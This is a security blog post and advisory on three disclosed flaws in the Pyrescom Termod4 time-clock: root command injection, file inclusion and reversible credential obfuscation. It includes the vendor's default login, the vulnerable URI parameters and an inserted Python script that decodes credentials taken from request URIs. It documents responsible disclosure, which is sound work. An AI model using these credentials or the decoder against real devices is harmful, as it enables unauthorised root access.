Multiple vulnerabilities discovered in Pyrescom Termod4 smart device
The Internet of things (IoT), cyber-physical systems, smart offices, smart homes. We are getting accustomed to these ‘smart’ concepts: lights turn off automatically when you leave home, your car drives you instead of the other way around, and a quick scan of your access badge checks you in at work. All the little conveniences that make our lives easier, our work more productive and our lives ever so slightly better… Until security issues bite you in the behind.
Tales from the frontline
This is a story from the frontlines by Outpost24’s OffSec team. It took place in late 2019 while we were on-site at a customer performing a full Red team engagement, meaning we assessed physical, human and cyber security at multiple facilities of the customer to see how well they were prepared to withstand a targeted attack. After physically breaking in and digitally hacking our way through one of their offices, we were at the last and probably trickiest part: the second on-site engagement, where we simulate a malicious insider. Basically, hacking the customer from the inside, using the access a regular employee or user would have, to see if we could get into the systems.
We were working our way through the network, stealthily identifying hosts, obtaining credentials and enumerating potentially interesting network shares. As the customer environment we were targeting was a rather large enterprise, time and stealth were two dependent variables: the Red team does not want to be detected by the Blue team monitoring the network, but on the other hand you want to keep making progress. On the second day, whilst performing our activities on the internal network, we spotted a web application that later turned out to be our way in.
Like a fly on the wall
When we identify a web application, we usually take a quick look, jot down its existence and potential (business) use and move on. However, this particular web application drew our attention closer. It might have been its ‘retro’ design, the copyright footer that said 2006 or its bright red logo… Whichever it was, the application piqued our interest.
A quick search taught us that the vendor provided various devices from defibrillators to time management and air quality systems. However, as we discovered this web application right before lunch, we decided to figure out what exactly we were dealing with after lunch. When we walked down the hallway on our way to have lunch, we saw it. Sitting there like a fly on the wall - a big blue box used by employees to track their time by simply swiping their badge or scanning their finger: The Pyrescom Termod. A blue timekeeping box of wonders.
Exploiting the fly
First thing we noticed was the use of default credentials. After a few guesses, the credentials appeared to be username ‘pyrescom‘ with password ‘admin’. Yep, not to be confused with admin:admin or admin:pyrescom. Meaning that it required some more guesses before we got the right credentials. Hacker’s essentials tip: Always try vendor names for credentials! Anyway, we were in. Time to explore this machine’s functionalities and see if we can get anything useful out of it.
Once logged in, we started exploring the menu options available on the Termod device. After just a few clicks we already noticed some potentially interesting things. What really caught our eye was present in almost every URI:
The cgi-bin directory often contains all sorts of interesting executable CGI files, which are used to obtain content from the web server and display it on the page served. The ‘fonction=’ part of the URI, which translated from French means function, changed dynamically based on the selection you made on the website. Some of the functions included were: Local Network, Distant Connection and Maintenance. You can tell why this became a whole lot more interesting: administrative functions over a physical device located in the client’s network.
When attempting to look at local logs, the first opportunity presented itself: Local File Inclusion. When opening a log, a new part was appended to the URI: ‘changement_log=file.log&login=s|uhvfrp&password=dgplq’. By changing the filename, we could read other files, including sensitive files such as /etc/passwd. This also gave us an interesting hint for our next observation… Command injection! As an added bonus, the web application submits ‘encrypted’ values for the username and password in every request, which is also not considered a security best practice.
If you have ever practised command injection in hacking tutorials or starter Capture-the-flag (CTF) events, you might have come across a simple example such as the one below:
By entering a (partially) legitimate command and then appending another command, malicious commands can be executed. In most cases you would be hard-pressed to come across such schoolbook examples of command injection… Ladies and gentlemen, we’ve got him! We could literally enter the same command in the URI as in the example shown above to have a physical device on the network execute commands on our behalf. And the best thing? The web application runs as root, giving us administrative power over the entire machine!
Simplifying our lives
Imagine working in our customer’s IT team and noticing these strange requests and weird logins on one of the Pyrescom devices. What do you do? Follow security best practice: investigate and change the password to lock the bad guys out! The next day we realized this is exactly what the IT team did. We were locked out of ‘our’ Pyrescom device. Earlier we mentioned the password values in the URI; after being denied access to the device, we discovered something else: a file called session.txt, available from the web interface without authentication. This file contained some weird, ‘encrypted’ values which in this case looked like the ones we had seen the day before.
So, what to do from here? These values are ‘encrypted’, and by now they had changed from the default (shown above) to something else. It turned out that this form of ‘encryption’ was rather primitive; after a few minutes of very intense cryptanalysis we noticed the following:
That’s right, the ‘encryption’ used here is a simple shift cipher (also known as a Caesar cipher) by a negative value of three applied to the ASCII value of each character. Whereas the normal alphabet runs a-z, this cipher produced a special character which does not occur in the normal alphabet. However, if you consider all ASCII characters, special characters can appear directly in your 128-character long ‘alphabet’. This allowed us to retrieve the newly updated username and password straight from the session.txt file. How convenient. We were back in the game!
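As an added illustration (not the Outpost24 PoC and not Pyrescom code), the ASCII shift described above applied to the values quoted earlier on this page; the URI prefix, script name and fonction value in the sample are placeholders, and wrapping around at 128 is an assumption.

```python
# Added example, not from the original post or the Pyrescom device.
# Shows that the Termod4 credential 'encryption' is a fixed shift of the
# 7-bit ASCII code and recovers the login/password from a request URI.
# Assumption: the shift wraps modulo 128 (the post's 128-character alphabet).

ASCII_SIZE = 128   # size of the 'alphabet' the post describes
SHIFT = 3          # stored value = plaintext + 3; decoding subtracts 3


def shift_ascii(text: str, k: int) -> str:
    """Shift every character's ASCII code by k, wrapping within 0..127."""
    out = []
    for ch in text:
        code = ord(ch)
        if code >= ASCII_SIZE:
            raise ValueError(f"{ch!r} is outside the 128-character alphabet")
        out.append(chr((code + k) % ASCII_SIZE))
    return "".join(out)


def decode_value(obfuscated: str) -> str:
    return shift_ascii(obfuscated, -SHIFT)


def encode_value(plain: str) -> str:
    return shift_ascii(plain, SHIFT)


def query_params(uri: str) -> dict:
    """Split the query string WITHOUT percent-decoding, so shifted bytes such
    as '|' or '+' are kept exactly as they appear on the wire."""
    query = uri.split("?", 1)[1] if "?" in uri else uri
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    return params


def credentials_from_uri(uri: str) -> dict:
    """Recover the plain-text login/password carried in a Termod4 request URI."""
    params = query_params(uri)
    return {n: decode_value(params[n]) for n in ("login", "password") if n in params}


# Constructed sample: the query fragment quoted in the post; script name and
# fonction value are placeholders, not taken from the device.
SAMPLE_URI = ("/cgi-bin/example.cgi?fonction=maintenance"
              "&changement_log=file.log&login=s|uhvfrp&password=dgplq")

if __name__ == "__main__":
    print(credentials_from_uri(SAMPLE_URI))
```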
Come fly with me
By having root access to any of these Termod machines, we effectively had a persistent foothold in various places throughout the customer’s network. And the best thing is that they cannot keep us out! However, finding the credentials for each machine and then utilizing the remote code execution by hand would be a bit tedious. So, we decided to automate this process in one useful script. All you need to do is put in the device IP address to get the credentials and optionally add a command to be executed. Below you’ll find a screenshot of the script in use; the PoC itself can be downloaded from the Outpost24 git repository (comes without warranty™).
As of 22-01-2021, the CVE IDs are released so these vulnerabilities can be referenced as CVE-2020-23160, CVE-2020-23161 and CVE-2020-23162.
CVE-2020-23160 - Remote code execution
Remote code execution in Pyrescom Termod4 time management devices before 10.04k allows authenticated remote attackers to execute arbitrary commands as root on the devices.
CVE-2020-23161 - Local file inclusion
Local file inclusion in Pyrescom Termod4 time management devices before 10.04k allows authenticated remote attackers to traverse directories and read sensitive files via the Maintenance > Logs menu by manipulating the file path in the URL.
CVE-2020-23162 - Sensitive information disclosure & weak encryption
Sensitive information disclosure and weak encryption in Pyrescom Termod4 time management devices before 10.04k allows remote attackers to read a session file and obtain plain-text user credentials.
Whenever we find a vulnerability, we notify the vendor and work towards a solution with them before disclosing it. In doing so, we follow our responsible disclosure policy. Below is the timeline of the disclosure of these vulnerabilities:
| Elapsed | Date | Event |
|---|---|---|
| 0 days | 18-12-2019 | Initial contact with vendor. |
| 2 days | 20-12-2019 | Second attempt at contact with vendor. |
| 21 days | 08-01-2020 | Third attempt at contact with vendor. |
| 29 days | 16-01-2020 | Vendor meeting set up through our customer. |
| 40 days | 27-01-2020 | Meeting with vendor and our customer; vendor acknowledged issues and received full write-up. |
| 82 days | 09-03-2020 | Update released and rolled out; performed brief re-test for our customer. Vulnerabilities resolved. |
| 83 days | 10-03-2020 | Confirmed patch effectiveness with vendor. Proposed disclosure timeline; no response from vendor. |
| 124 days | 20-04-2020 | Proposed disclosure timeline again; no response from vendor. |
| 141 days | 07-05-2020 | CVE reservation requested. More than 100 days since confirmation by vendor. |
| 401 days | 22-01-2021 | Multiple requests towards MITRE for update/CVE in the past 204 days. After re-submission, CVE IDs were released on January 22nd. |
| 408 days | 29-01-2021 | Release of this blog, CVE IDs and PoC. |
Although the vulnerabilities have been fixed, exact details on the patched versions are unknown and not acknowledged by the vendor. We discovered the vulnerabilities in version 10.02r and verified that in version 10.04k they are remediated. How intermediate releases are affected is unknown; we therefore recommend upgrading to the latest stable firmware version available for your device.
About Ghost Labs
Ghost Labs is the specialist security unit within Outpost24, offering enhanced security services such as advanced network penetration testing, (web)application testing, Red Teaming assessments and complex web application exploitation. In addition, the Ghost Labs team is an active contributor to the security community with vulnerability research and coordinated responsible disclosure programs.
Ghost Labs performs hundreds of successful penetration tests for its customers, ranging from global enterprises to SMEs. Our team consists of highly skilled ethical hackers, covering a wide range of advanced testing services to help companies keep up with evolving threats and new technologies.